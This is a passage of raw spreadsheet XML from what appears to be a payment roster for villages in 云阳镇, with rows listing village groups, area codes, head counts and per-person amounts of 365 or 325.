      <c r="G1431" s="24"/>
      <c r="H1431" s="24"/>
      <c r="I1431" s="24">
        <f t="shared" si="22"/>
        <v>0</v>
      </c>
      <c r="J1431" s="24"/>
      <c r="K1431" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1432" customHeight="1" spans="1:12">
      <c r="A1432" s="23" t="s">
        <v>3867</v>
      </c>
      <c r="B1432" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1432" s="24" t="s">
        <v>3721</v>
      </c>
      <c r="D1432" s="24" t="s">
        <v>3868</v>
      </c>
      <c r="E1432" s="24" t="s">
        <v>3869</v>
      </c>
      <c r="F1432" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1432" s="24">
        <v>1</v>
      </c>
      <c r="H1432" s="25">
        <v>365</v>
      </c>
      <c r="I1432" s="24">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J1432" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1432" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1433" customHeight="1" spans="1:12">
      <c r="A1433" s="23" t="s">
        <v>3870</v>
      </c>
      <c r="B1433" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1433" s="24" t="s">
        <v>3721</v>
      </c>
      <c r="D1433" s="24" t="s">
        <v>3871</v>
      </c>
      <c r="E1433" s="24" t="s">
        <v>3872</v>
      </c>
      <c r="F1433" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1433" s="24">
        <v>1</v>
      </c>
      <c r="H1433" s="25">
        <v>365</v>
      </c>
      <c r="I1433" s="24">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J1433" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1433" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1434" customHeight="1" spans="1:12">
      <c r="A1434" s="23" t="s">
        <v>3873</v>
      </c>
      <c r="B1434" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1434" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1434" s="24" t="s">
        <v>3874</v>
      </c>
      <c r="E1434" s="24" t="s">
        <v>3707</v>
      </c>
      <c r="F1434" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1434" s="24">
        <v>1</v>
      </c>
      <c r="H1434" s="25">
        <v>365</v>
      </c>
      <c r="I1434" s="24">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J1434" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1434" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1435" customHeight="1" spans="1:12">
      <c r="A1435" s="23" t="s">
        <v>3875</v>
      </c>
      <c r="B1435" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1435" s="24" t="s">
        <v>3639</v>
      </c>
      <c r="D1435" s="24" t="s">
        <v>3876</v>
      </c>
      <c r="E1435" s="24" t="s">
        <v>3575</v>
      </c>
      <c r="F1435" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1435" s="24">
        <v>1</v>
      </c>
      <c r="H1435" s="25">
        <v>365</v>
      </c>
      <c r="I1435" s="24">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J1435" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1435" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1436" customHeight="1" spans="1:12">
      <c r="A1436" s="23" t="s">
        <v>3877</v>
      </c>
      <c r="B1436" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1436" s="24" t="s">
        <v>3564</v>
      </c>
      <c r="D1436" s="24" t="s">
        <v>3878</v>
      </c>
      <c r="E1436" s="24" t="s">
        <v>2552</v>
      </c>
      <c r="F1436" s="24" t="s">
        <v>3567</v>
      </c>
      <c r="G1436" s="24">
        <v>1</v>
      </c>
      <c r="H1436" s="25">
        <v>365</v>
      </c>
      <c r="I1436" s="24">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J1436" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1436" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1437" customHeight="1" spans="1:12">
      <c r="A1437" s="23" t="s">
        <v>3879</v>
      </c>
      <c r="B1437" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1437" s="24" t="s">
        <v>3592</v>
      </c>
      <c r="D1437" s="24" t="s">
        <v>3880</v>
      </c>
      <c r="E1437" s="24" t="s">
        <v>3623</v>
      </c>
      <c r="F1437" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1437" s="24">
        <v>1</v>
      </c>
      <c r="H1437" s="25">
        <v>365</v>
      </c>
      <c r="I1437" s="24">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J1437" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1437" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1438" customHeight="1" spans="1:12">
      <c r="A1438" s="23" t="s">
        <v>3881</v>
      </c>
      <c r="B1438" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1438" s="24" t="s">
        <v>3578</v>
      </c>
      <c r="D1438" s="24" t="s">
        <v>3882</v>
      </c>
      <c r="E1438" s="24" t="s">
        <v>3883</v>
      </c>
      <c r="F1438" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1438" s="24">
        <v>1</v>
      </c>
      <c r="H1438" s="25">
        <v>365</v>
      </c>
      <c r="I1438" s="24">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J1438" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1438" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1439" customHeight="1" spans="1:12">
      <c r="A1439" s="23" t="s">
        <v>3884</v>
      </c>
      <c r="B1439" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1439" s="24" t="s">
        <v>3564</v>
      </c>
      <c r="D1439" s="24" t="s">
        <v>3885</v>
      </c>
      <c r="E1439" s="24" t="s">
        <v>3886</v>
      </c>
      <c r="F1439" s="24" t="s">
        <v>3567</v>
      </c>
      <c r="G1439" s="24">
        <v>1</v>
      </c>
      <c r="H1439" s="25">
        <v>365</v>
      </c>
      <c r="I1439" s="24">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J1439" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1439" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1440" customHeight="1" spans="1:12">
      <c r="A1440" s="23" t="s">
        <v>3887</v>
      </c>
      <c r="B1440" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1440" s="24" t="s">
        <v>3675</v>
      </c>
      <c r="D1440" s="24" t="s">
        <v>3888</v>
      </c>
      <c r="E1440" s="24" t="s">
        <v>3601</v>
      </c>
      <c r="F1440" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1440" s="24">
        <v>2</v>
      </c>
      <c r="H1440" s="25">
        <v>325</v>
      </c>
      <c r="I1440" s="24">
        <f t="shared" si="22"/>
        <v>650</v>
      </c>
      <c r="J1440" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1440" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1441" customHeight="1" spans="1:11">
      <c r="A1441" s="23" t="s">
        <v>3889</v>
      </c>
      <c r="B1441" s="24" t="str">
        <f>B1440</f>
        <v>云阳镇</v>
      </c>
      <c r="C1441" s="24" t="str">
        <f>C1440</f>
        <v>镇直（政府）</v>
      </c>
      <c r="D1441" s="23" t="s">
        <v>3890</v>
      </c>
      <c r="E1441" s="23" t="s">
        <v>3891</v>
      </c>
      <c r="F1441" s="24" t="str">
        <f>F1440</f>
        <v>4113210599</v>
      </c>
      <c r="G1441" s="24"/>
      <c r="H1441" s="24"/>
      <c r="I1441" s="24">
        <f t="shared" si="22"/>
        <v>0</v>
      </c>
      <c r="J1441" s="24"/>
      <c r="K1441" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1442" customHeight="1" spans="1:11">
      <c r="A1442" s="23" t="s">
        <v>3892</v>
      </c>
      <c r="B1442" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1442" s="24" t="s">
        <v>3675</v>
      </c>
      <c r="D1442" s="24" t="s">
        <v>3893</v>
      </c>
      <c r="E1442" s="24" t="s">
        <v>3894</v>
      </c>
      <c r="F1442" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1442" s="24">
        <v>1</v>
      </c>
      <c r="H1442" s="25">
        <v>365</v>
      </c>
      <c r="I1442" s="24">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J1442" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1442" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1443" customHeight="1" spans="1:11">
      <c r="A1443" s="23" t="s">
        <v>3895</v>
      </c>
      <c r="B1443" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1443" s="24" t="s">
        <v>3578</v>
      </c>
      <c r="D1443" s="24" t="s">
        <v>3896</v>
      </c>
      <c r="E1443" s="24" t="s">
        <v>3637</v>
      </c>
      <c r="F1443" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1443" s="24">
        <v>1</v>
      </c>
      <c r="H1443" s="25">
        <v>365</v>
      </c>
      <c r="I1443" s="24">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J1443" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1443" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1444" customHeight="1" spans="1:11">
      <c r="A1444" s="23" t="s">
        <v>3897</v>
      </c>
      <c r="B1444" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1444" s="24" t="s">
        <v>3721</v>
      </c>
      <c r="D1444" s="24" t="s">
        <v>3898</v>
      </c>
      <c r="E1444" s="24" t="s">
        <v>3832</v>
      </c>
      <c r="F1444" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1444" s="24">
        <v>2</v>
      </c>
      <c r="H1444" s="25">
        <v>325</v>
      </c>
      <c r="I1444" s="24">
        <f t="shared" si="22"/>
        <v>650</v>
      </c>
      <c r="J1444" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1444" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1445" customHeight="1" spans="1:11">
      <c r="A1445" s="23" t="s">
        <v>3899</v>
      </c>
      <c r="B1445" s="24" t="str">
        <f>B1444</f>
        <v>云阳镇</v>
      </c>
      <c r="C1445" s="24" t="str">
        <f>C1444</f>
        <v>老城二组</v>
      </c>
      <c r="D1445" s="23" t="s">
        <v>3900</v>
      </c>
      <c r="E1445" s="23" t="s">
        <v>3662</v>
      </c>
      <c r="F1445" s="24" t="str">
        <f>F1444</f>
        <v>4113210523</v>
      </c>
      <c r="G1445" s="24"/>
      <c r="H1445" s="24"/>
      <c r="I1445" s="24">
        <f t="shared" si="22"/>
        <v>0</v>
      </c>
      <c r="J1445" s="24"/>
      <c r="K1445" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1446" customHeight="1" spans="1:11">
      <c r="A1446" s="23" t="s">
        <v>3901</v>
      </c>
      <c r="B1446" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1446" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1446" s="24" t="s">
        <v>3902</v>
      </c>
      <c r="E1446" s="24" t="s">
        <v>3786</v>
      </c>
      <c r="F1446" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1446" s="24">
        <v>1</v>
      </c>
      <c r="H1446" s="25">
        <v>365</v>
      </c>
      <c r="I1446" s="24">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J1446" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1446" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1447" customHeight="1" spans="1:11">
      <c r="A1447" s="23" t="s">
        <v>3903</v>
      </c>
      <c r="B1447" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1447" s="24" t="s">
        <v>3904</v>
      </c>
      <c r="D1447" s="24" t="s">
        <v>3905</v>
      </c>
      <c r="E1447" s="24" t="s">
        <v>3813</v>
      </c>
      <c r="F1447" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1447" s="24">
        <v>1</v>
      </c>
      <c r="H1447" s="25">
        <v>365</v>
      </c>
      <c r="I1447" s="24">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J1447" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1447" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1448" customHeight="1" spans="1:11">
      <c r="A1448" s="23" t="s">
        <v>3906</v>
      </c>
      <c r="B1448" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1448" s="24" t="s">
        <v>3774</v>
      </c>
      <c r="D1448" s="24" t="s">
        <v>3907</v>
      </c>
      <c r="E1448" s="24" t="s">
        <v>2566</v>
      </c>
      <c r="F1448" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1448" s="24">
        <v>1</v>
      </c>
      <c r="H1448" s="25">
        <v>365</v>
      </c>
      <c r="I1448" s="24">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J1448" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1448" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1449" customHeight="1" spans="1:11">
      <c r="A1449" s="23" t="s">
        <v>3908</v>
      </c>
      <c r="B1449" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1449" s="24" t="s">
        <v>3589</v>
      </c>
      <c r="D1449" s="24" t="s">
        <v>3909</v>
      </c>
      <c r="E1449" s="24" t="s">
        <v>3832</v>
      </c>
      <c r="F1449" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1449" s="24">
        <v>1</v>
      </c>
      <c r="H1449" s="25">
        <v>365</v>
      </c>
      <c r="I1449" s="24">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J1449" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1449" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1450" customHeight="1" spans="1:11">
      <c r="A1450" s="23" t="s">
        <v>3910</v>
      </c>
      <c r="B1450" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1450" s="24" t="s">
        <v>3564</v>
      </c>
      <c r="D1450" s="24" t="s">
        <v>3911</v>
      </c>
      <c r="E1450" s="24" t="s">
        <v>3912</v>
      </c>
      <c r="F1450" s="24" t="s">
        <v>3567</v>
      </c>
      <c r="G1450" s="24">
        <v>1</v>
      </c>
      <c r="H1450" s="25">
        <v>365</v>
      </c>
      <c r="I1450" s="24">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J1450" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1450" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1451" customHeight="1" spans="1:11">
      <c r="A1451" s="23" t="s">
        <v>3913</v>
      </c>
      <c r="B1451" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1451" s="24" t="s">
        <v>3914</v>
      </c>
      <c r="D1451" s="24" t="s">
        <v>3915</v>
      </c>
      <c r="E1451" s="24" t="s">
        <v>2566</v>
      </c>
      <c r="F1451" s="24" t="s">
        <v>3567</v>
      </c>
      <c r="G1451" s="24">
        <v>1</v>
      </c>
      <c r="H1451" s="25">
        <v>365</v>
      </c>
      <c r="I1451" s="24">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J1451" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1451" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1452" customHeight="1" spans="1:11">
      <c r="A1452" s="23" t="s">
        <v>3916</v>
      </c>
      <c r="B1452" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1452" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1452" s="24" t="s">
        <v>3917</v>
      </c>
      <c r="E1452" s="24" t="s">
        <v>3001</v>
      </c>
      <c r="F1452" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1452" s="24">
        <v>1</v>
      </c>
      <c r="H1452" s="25">
        <v>365</v>
      </c>
      <c r="I1452" s="24">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J1452" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1452" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1453" customHeight="1" spans="1:11">
      <c r="A1453" s="23" t="s">
        <v>3918</v>
      </c>
      <c r="B1453" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1453" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1453" s="24" t="s">
        <v>3919</v>
      </c>
      <c r="E1453" s="24" t="s">
        <v>3813</v>
      </c>
      <c r="F1453" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1453" s="24">
        <v>1</v>
      </c>
      <c r="H1453" s="25">
        <v>365</v>
      </c>
      <c r="I1453" s="24">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J1453" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1453" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1454" customHeight="1" spans="1:11">
      <c r="A1454" s="23" t="s">
        <v>3920</v>
      </c>
      <c r="B1454" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1454" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1454" s="24" t="s">
        <v>3921</v>
      </c>
      <c r="E1454" s="24" t="s">
        <v>3922</v>
      </c>
      <c r="F1454" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1454" s="24">
        <v>2</v>
      </c>
      <c r="H1454" s="25">
        <v>325</v>
      </c>
      <c r="I1454" s="24">
        <f t="shared" si="22"/>
        <v>650</v>
      </c>
      <c r="J1454" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1454" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1455" customHeight="1" spans="1:11">
      <c r="A1455" s="23" t="s">
        <v>3923</v>
      </c>
      <c r="B1455" s="24" t="str">
        <f>B1454</f>
        <v>云阳镇</v>
      </c>
      <c r="C1455" s="24" t="str">
        <f>C1454</f>
        <v>南召店袁庄</v>
      </c>
      <c r="D1455" s="23" t="s">
        <v>3924</v>
      </c>
      <c r="E1455" s="23" t="s">
        <v>3598</v>
      </c>
      <c r="F1455" s="24" t="str">
        <f>F1454</f>
        <v>4113210519</v>
      </c>
      <c r="G1455" s="24"/>
      <c r="H1455" s="24"/>
      <c r="I1455" s="24">
        <f t="shared" si="22"/>
        <v>0</v>
      </c>
      <c r="J1455" s="24"/>
      <c r="K1455" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1456" customHeight="1" spans="1:11">
      <c r="A1456" s="23" t="s">
        <v>3925</v>
      </c>
      <c r="B1456" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1456" s="24" t="s">
        <v>3639</v>
      </c>
      <c r="D1456" s="24" t="s">
        <v>3926</v>
      </c>
      <c r="E1456" s="24" t="s">
        <v>3594</v>
      </c>
      <c r="F1456" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1456" s="24">
        <v>1</v>
      </c>
      <c r="H1456" s="25">
        <v>365</v>
      </c>
      <c r="I1456" s="24">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J1456" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1456" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1457" customHeight="1" spans="1:12">
      <c r="A1457" s="23" t="s">
        <v>3927</v>
      </c>
      <c r="B1457" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1457" s="24" t="s">
        <v>3555</v>
      </c>
      <c r="D1457" s="24" t="s">
        <v>3928</v>
      </c>
      <c r="E1457" s="24" t="s">
        <v>3929</v>
      </c>
      <c r="F1457" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1457" s="24">
        <v>1</v>
      </c>
      <c r="H1457" s="25">
        <v>365</v>
      </c>
      <c r="I1457" s="24">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J1457" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1457" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1458" customHeight="1" spans="1:12">
      <c r="A1458" s="23" t="s">
        <v>3930</v>
      </c>
      <c r="B1458" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1458" s="24" t="s">
        <v>3589</v>
      </c>
      <c r="D1458" s="24" t="s">
        <v>3931</v>
      </c>
      <c r="E1458" s="24" t="s">
        <v>3862</v>
      </c>
      <c r="F1458" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1458" s="24">
        <v>1</v>
      </c>
      <c r="H1458" s="25">
        <v>365</v>
      </c>
      <c r="I1458" s="24">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J1458" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1458" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1459" customHeight="1" spans="1:12">
      <c r="A1459" s="23" t="s">
        <v>3932</v>
      </c>
      <c r="B1459" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1459" s="24" t="s">
        <v>3615</v>
      </c>
      <c r="D1459" s="24" t="s">
        <v>3933</v>
      </c>
      <c r="E1459" s="24" t="s">
        <v>1312</v>
      </c>
      <c r="F1459" s="24" t="s">
        <v>3567</v>
      </c>
      <c r="G1459" s="24">
        <v>1</v>
      </c>
      <c r="H1459" s="25">
        <v>365</v>
      </c>
      <c r="I1459" s="24">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J1459" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1459" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1460" customHeight="1" spans="1:12">
      <c r="A1460" s="23" t="s">
        <v>3934</v>
      </c>
      <c r="B1460" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1460" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1460" s="24" t="s">
        <v>3935</v>
      </c>
      <c r="E1460" s="24" t="s">
        <v>3936</v>
      </c>
      <c r="F1460" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1460" s="24">
        <v>1</v>
      </c>
      <c r="H1460" s="25">
        <v>365</v>
      </c>
      <c r="I1460" s="24">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J1460" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1460" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1461" customHeight="1" spans="1:12">
      <c r="A1461" s="23" t="s">
        <v>3937</v>
      </c>
      <c r="B1461" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1461" s="24" t="s">
        <v>3639</v>
      </c>
      <c r="D1461" s="24" t="s">
        <v>3938</v>
      </c>
      <c r="E1461" s="24" t="s">
        <v>3344</v>
      </c>
      <c r="F1461" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1461" s="24">
        <v>1</v>
      </c>
      <c r="H1461" s="25">
        <v>365</v>
      </c>
      <c r="I1461" s="24">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J1461" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1461" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1462" customHeight="1" spans="1:12">
      <c r="A1462" s="23" t="s">
        <v>3939</v>
      </c>
      <c r="B1462" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1462" s="24" t="s">
        <v>3798</v>
      </c>
      <c r="D1462" s="24" t="s">
        <v>3940</v>
      </c>
      <c r="E1462" s="24" t="s">
        <v>3869</v>
      </c>
      <c r="F1462" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1462" s="24">
        <v>1</v>
      </c>
      <c r="H1462" s="25">
        <v>365</v>
      </c>
      <c r="I1462" s="24">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J1462" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1462" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1463" customHeight="1" spans="1:12">
      <c r="A1463" s="23" t="s">
        <v>3941</v>
      </c>
      <c r="B1463" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1463" s="24" t="s">
        <v>3555</v>
      </c>
      <c r="D1463" s="24" t="s">
        <v>3942</v>
      </c>
      <c r="E1463" s="24" t="s">
        <v>3566</v>
      </c>
      <c r="F1463" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1463" s="24">
        <v>1</v>
      </c>
      <c r="H1463" s="25">
        <v>365</v>
      </c>
      <c r="I1463" s="24">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J1463" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1463" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1464" customHeight="1" spans="1:12">
      <c r="A1464" s="23" t="s">
        <v>3943</v>
      </c>
      <c r="B1464" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1464" s="24" t="s">
        <v>3596</v>
      </c>
      <c r="D1464" s="24" t="s">
        <v>3944</v>
      </c>
      <c r="E1464" s="24" t="s">
        <v>3580</v>
      </c>
      <c r="F1464" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1464" s="24">
        <v>2</v>
      </c>
      <c r="H1464" s="25">
        <v>325</v>
      </c>
      <c r="I1464" s="24">
        <f t="shared" si="22"/>
        <v>650</v>
      </c>
      <c r="J1464" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1464" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1465" customHeight="1" spans="1:12">
      <c r="A1465" s="23" t="s">
        <v>3945</v>
      </c>
      <c r="B1465" s="24" t="str">
        <f>B1464</f>
        <v>云阳镇</v>
      </c>
      <c r="C1465" s="24" t="str">
        <f>C1464</f>
        <v>小关二组</v>
      </c>
      <c r="D1465" s="23" t="s">
        <v>3946</v>
      </c>
      <c r="E1465" s="23" t="s">
        <v>3566</v>
      </c>
      <c r="F1465" s="24" t="str">
        <f>F1464</f>
        <v>4113210521</v>
      </c>
      <c r="G1465" s="24"/>
      <c r="H1465" s="24"/>
      <c r="I1465" s="24">
        <f t="shared" si="22"/>
        <v>0</v>
      </c>
      <c r="J1465" s="24"/>
      <c r="K1465" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1466" customHeight="1" spans="1:12">
      <c r="A1466" s="23" t="s">
        <v>3947</v>
      </c>
      <c r="B1466" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1466" s="24" t="s">
        <v>3596</v>
      </c>
      <c r="D1466" s="24" t="s">
        <v>3948</v>
      </c>
      <c r="E1466" s="24" t="s">
        <v>3695</v>
      </c>
      <c r="F1466" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1466" s="24">
        <v>1</v>
      </c>
      <c r="H1466" s="25">
        <v>365</v>
      </c>
      <c r="I1466" s="24">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J1466" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1466" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1467" customHeight="1" spans="1:12">
      <c r="A1467" s="23" t="s">
        <v>3949</v>
      </c>
      <c r="B1467" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1467" s="24" t="s">
        <v>3721</v>
      </c>
      <c r="D1467" s="24" t="s">
        <v>3950</v>
      </c>
      <c r="E1467" s="24" t="s">
        <v>3951</v>
      </c>
      <c r="F1467" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1467" s="24">
        <v>1</v>
      </c>
      <c r="H1467" s="25">
        <v>365</v>
      </c>
      <c r="I1467" s="24">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J1467" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1467" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1468" customHeight="1" spans="1:12">
      <c r="A1468" s="23" t="s">
        <v>3952</v>
      </c>
      <c r="B1468" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1468" s="24" t="s">
        <v>3798</v>
      </c>
      <c r="D1468" s="24" t="s">
        <v>3953</v>
      </c>
      <c r="E1468" s="24" t="s">
        <v>3655</v>
      </c>
      <c r="F1468" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1468" s="24">
        <v>2</v>
      </c>
      <c r="H1468" s="25">
        <v>325</v>
      </c>
      <c r="I1468" s="24">
        <f t="shared" si="22"/>
        <v>650</v>
      </c>
      <c r="J1468" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1468" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1469" s="4" customFormat="1" customHeight="1" spans="1:12">
      <c r="A1469" s="23" t="s">
        <v>3954</v>
      </c>
      <c r="B1469" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1469" s="24" t="s">
        <v>3798</v>
      </c>
      <c r="D1469" s="56" t="s">
        <v>3955</v>
      </c>
      <c r="E1469" s="57" t="s">
        <v>3956</v>
      </c>
      <c r="F1469" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1469" s="56"/>
      <c r="H1469" s="58"/>
      <c r="I1469" s="24">
        <f t="shared" si="22"/>
        <v>0</v>
      </c>
      <c r="J1469" s="5" t="s">
        <v>1242</v>
      </c>
      <c r="K1469" s="24" t="s">
        <v>225</v>
      </c>
      <c r="L1469" s="8"/>
    </row>
    <row r="1470" customHeight="1" spans="1:12">
      <c r="A1470" s="23" t="s">
        <v>3957</v>
      </c>
      <c r="B1470" s="24" t="s">
